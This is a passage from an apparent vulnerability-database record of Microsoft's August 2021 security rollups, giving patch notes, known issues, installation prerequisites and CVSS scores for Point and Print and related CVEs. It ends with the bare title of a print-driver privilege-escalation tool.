package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005090>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005090](<https://download.microsoft.com/download/3/e/d/3ed5bcad-9cd8-4084-860a-0eeff78ed341/5005090.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005090 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005090", "href": "https://support.microsoft.com/en-us/help/5005090", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:19", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005392](<https://support.microsoft.com/help/5005392>).\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed **in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\n * If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or t
Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool
